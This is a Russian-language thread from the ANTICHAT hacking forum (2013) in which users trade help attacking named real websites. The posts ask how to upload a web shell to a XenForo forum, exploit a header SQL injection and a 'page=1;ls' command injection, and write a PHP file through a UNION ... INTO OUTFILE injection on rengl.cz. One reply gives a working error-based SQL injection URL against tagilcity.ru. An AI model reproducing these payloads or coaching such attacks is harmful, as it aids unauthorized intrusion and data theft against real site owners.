ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

19.01.2013, 12:05
|
|
Новичок
Регистрация: 23.01.2010
Сообщений: 0
Провел на форуме: 1865
Репутация:
0
|
|
Приветствую Вас. Я хотел бы спросить, возможно ли залить шелл на XenForo версии 1.0.4? Если да, то стучите в ЛС. Или расскажите тут. Заранее благодарен)
|
|
|

20.01.2013, 14:33
|
|
Guest
Сообщений: n/a
Провел на форуме: 124363
Репутация:
11
|
|
помогите раскрутить,что то не получается
инъекция в заголовке в x-forwarded-for: 1'"
Код:
Code:
http://drive.s13.ru/?id=1
а то чё то туплю.
|
|
|
|

20.01.2013, 22:10
|
|
Guest
Сообщений: n/a
Провел на форуме: 34457
Репутация:
-10
|
|
Залил shell на форум,открыл но там такая ситуация.
http://savepic.org/2581219.png
права на загрузку есть в папку tmp мона ли как-то оттуда потом открыть shell ? спасибо.
|
|
|
|

20.01.2013, 22:15
|
|
Guest
Сообщений: n/a
Провел на форуме: 46989
Репутация:
20
|
|
Помогите плиз, есть сайт при запросе page=1;ls отображает содержимое текущей директории, а вот при запросах с пробелами на пример page=1;ls -lha ничего не отображает.
|
|
|
|

21.01.2013, 00:48
|
|
Guest
Сообщений: n/a
Провел на форуме: 124363
Репутация:
11
|
|
Сообщение от Vip77
Vip77 said:
Помогите плиз, есть сайт при запросе page=1;ls отображает содержимое текущей директории, а вот при запросах с пробелами на пример page=1;ls -lha ничего не отображает.
пробуй так
|
|
|
|

21.01.2013, 03:03
|
|
Guest
Сообщений: n/a
Провел на форуме: 41100
Репутация:
1
|
|
Запрос:
Код:
Code:
http://www.rengl.cz/ceniky/mesto.php?id=-119'+union+select+1,'',3,4,5,6,7,8,9,10 INTO OUTFILE '/srv/http/adent.cz/rengl.cz/1.php' --+
Результат (файл rengl.cz/1.php не создается):
Код:
Code:
Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /srv/http/adent.cz/rengl.cz/ceniky/mesto.php on line 37
Почему?
|
|
|
|

21.01.2013, 03:51
|
|
Guest
Сообщений: n/a
Провел на форуме: 124363
Репутация:
11
|
|
в HEX переведи попробуй.
Может ещё быть что прав нет на корневую папку,ищи врайтабельную.
|
|
|
|

21.01.2013, 09:39
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме: 69033
Репутация:
8
|
|
Сообщение от Faaax
Faaax said:
в HEX переведи попробуй.
Да что вы говорите ? И из hex код исполнится ? Бред !!
можно и нужно урезать до
Попробуй.
|
|
|

21.01.2013, 16:02
|
|
Guest
Сообщений: n/a
Провел на форуме: 107835
Репутация:
23
|
|
Есть скуля, раскрутить не знаю как
_http://tagilcity.ru/component/option,com_fireboard/func,fbprofile/task,showprf'/?option=com_fireboard&func=showcat&Go=%25D0%2598%2 5D0%25B4%25D1%2582%25D0%25B8&catid=171
|
|
|
|

21.01.2013, 20:43
|
|
Guest
Сообщений: n/a
Провел на форуме: 28262
Репутация:
23
|
|
Сообщение от er9j6@
er9j6@ said:
Есть скуля, раскрутить не знаю как
_http://tagilcity.ru/component/option,com_fireboard/func,fbprofile/task,showprf'/?option=com_fireboard&func=showcat&Go=%25D0%2598%2 5D0%25B4%25D1%2582%25D0%25B8&catid=171
Код:
Code:
http://tagilcity.ru/index.php?option=com_fireboard'+AND+(SELECT+4662+FROM(SELECT+COUNT(*),CONCAT(0x7e414e5449434841547e,(SELECT(CASE+WHEN+(4662=4662)+THEN+version()+ELSE+0+END)),0x7e414e5449434841547e,FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)+AND+'RGKx'='RGKx&func=fbprofile&task=showprf
Найденную Вами SQL инъекцию можно сократить, т.к. запрос один и тот же, только вот первая его часть представлена как ЧПУ, а вторам с GET параметрами, собственно реализацию которой я Вам и продемонстрировал.
|
|
|
|
|
 |
|
|
Здесь присутствуют: 3 (пользователей: 0 , гостей: 3)
|
|
|
|